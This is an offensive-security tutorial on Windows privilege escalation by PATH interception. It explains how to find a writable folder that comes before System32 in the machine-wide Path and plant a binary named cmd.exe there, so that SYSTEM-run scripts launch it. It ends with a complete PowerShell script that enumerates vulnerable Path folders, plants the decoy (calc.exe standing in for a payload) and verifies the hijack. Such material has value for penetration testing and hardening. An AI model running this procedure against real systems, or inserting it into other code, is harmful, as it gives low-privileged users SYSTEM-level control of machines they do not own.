Environment Variable $Path Interception

It's possible to abuse the Path environment variable (%PATH% in cmd, $env:Path in PowerShell) to elevate privileges if the variable:

  • contains a folder that a low-privileged user can write to

  • lists that folder before c:\windows\system32\ (the folder holding the binary being impersonated)

  • carries that folder in the machine-wide (HKLM) Path, since a SYSTEM service or another user's process never sees a low-privileged user's own user-scope Path

Below is an example showing a Path in which c:\temp precedes c:\windows\system32:

Let's make sure c:\temp is (M)odifiable by low-privileged users, i.e. icacls reports Modify (M) for a group such as Users or Authenticated Users:

Let's now drop our malicious file (calc.exe in this case, standing in for a real payload) into c:\temp and name it cmd.exe:

Now, the next time a high-privileged user or service invokes cmd.exe by bare name, the lookup walks Path in order and runs our cmd.exe from c:\temp instead of the real one in c:\windows\system32. One caveat: this applies to name resolution done by a shell or script host (cmd.exe, PowerShell, a batch or VBScript wrapper), which search Path in order; a caller that passes the bare name straight to CreateProcess or SearchPath has the Windows system directory searched before Path, so the genuine System32 binary wins there:

This is very easy to abuse in environments where software deployment packages run batch or script wrappers that call powershell, cmd, cscript and similar system binaries by bare name with NT AUTHORITY\SYSTEM privileges to carry out their tasks.
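The whole procedure above, as an added example that is not from the original page: a PowerShell script, run as the low-privileged user, that walks the machine-wide Path in order, flags writable folders that come before System32, plants calc.exe under the name cmd.exe in the first such folder (c:\temp on this page), and then shows what a Path lookup resolves. The Test-Writable function, the ordering logic and the output format are this example's own assumptions, not anything the page shows.

```powershell
# Added example, not from the original page. Run as the low-privileged user.
# 1) Walk the machine-wide Path (what SYSTEM services inherit) in order and
#    flag folders we can write to that come before System32.
$system32 = [Environment]::GetFolderPath('System')          # usually C:\Windows\System32

# $env:Path is the machine Path and user Path merged for this session; a SYSTEM
# service or another user's process only sees the machine-scope value.
$machinePath = [Environment]::GetEnvironmentVariable('Path', 'Machine')
$entries = @($machinePath -split ';' |
    Where-Object { $_.Trim() -ne '' } |
    ForEach-Object { [Environment]::ExpandEnvironmentVariables($_.Trim()).TrimEnd('\') })

# Position of System32 in the list (-1 if absent, in which case every entry precedes it).
$system32Index = -1
for ($j = 0; $j -lt $entries.Count; $j++) {
    if ($entries[$j] -ieq $system32) { $system32Index = $j; break }
}

function Test-Writable {
    param([string]$Dir)
    if (-not (Test-Path -LiteralPath $Dir -PathType Container)) { return $false }
    # Attempt a real write instead of parsing the ACL: inherited and deny ACEs
    # are easy to misread in icacls output, a probe file is not.
    $probe = Join-Path $Dir ([IO.Path]::GetRandomFileName())
    try {
        [IO.File]::WriteAllText($probe, '')
        Remove-Item -LiteralPath $probe -Force
        return $true
    } catch {
        return $false
    }
}

$hijackable = @()
for ($i = 0; $i -lt $entries.Count; $i++) {
    $dir      = $entries[$i]
    $writable = Test-Writable $dir
    $before   = ($system32Index -lt 0) -or ($i -lt $system32Index)
    $note = ''
    if ($writable) { $note = if ($before) { 'HIJACKABLE (writable, precedes System32)' } else { 'writable, but after System32' } }
    '{0,2}  {1,-45} {2}' -f $i, $dir, $note
    if ($writable -and $before) { $hijackable += $dir }
}

# 2) Plant the decoy. As on the page, calc.exe stands in for the payload and the
#    writable folder is the first HIJACKABLE hit (c:\temp in the page's setup).
if ($hijackable.Count -gt 0) {
    $target = Join-Path $hijackable[0] 'cmd.exe'
    Copy-Item -LiteralPath (Join-Path $system32 'calc.exe') -Destination $target

    # 3) Check what a shell-style lookup now resolves. PowerShell walks Path in
    #    order, so Source should point at the planted file; where.exe lists every
    #    match in search order, the first one being what cmd.exe would run.
    (Get-Command cmd.exe -CommandType Application).Source
    where.exe cmd.exe
}
```

Delete the planted cmd.exe when done, since leaving a decoy that launches calc.exe in a Path folder breaks every shell-driven cmd.exe invocation on the host. If the audit reports a writable folder only after System32, it is still worth noting: it can intercept any binary that lives later in Path or not at all (a misspelled or missing tool name in a deployment script), just not cmd.exe.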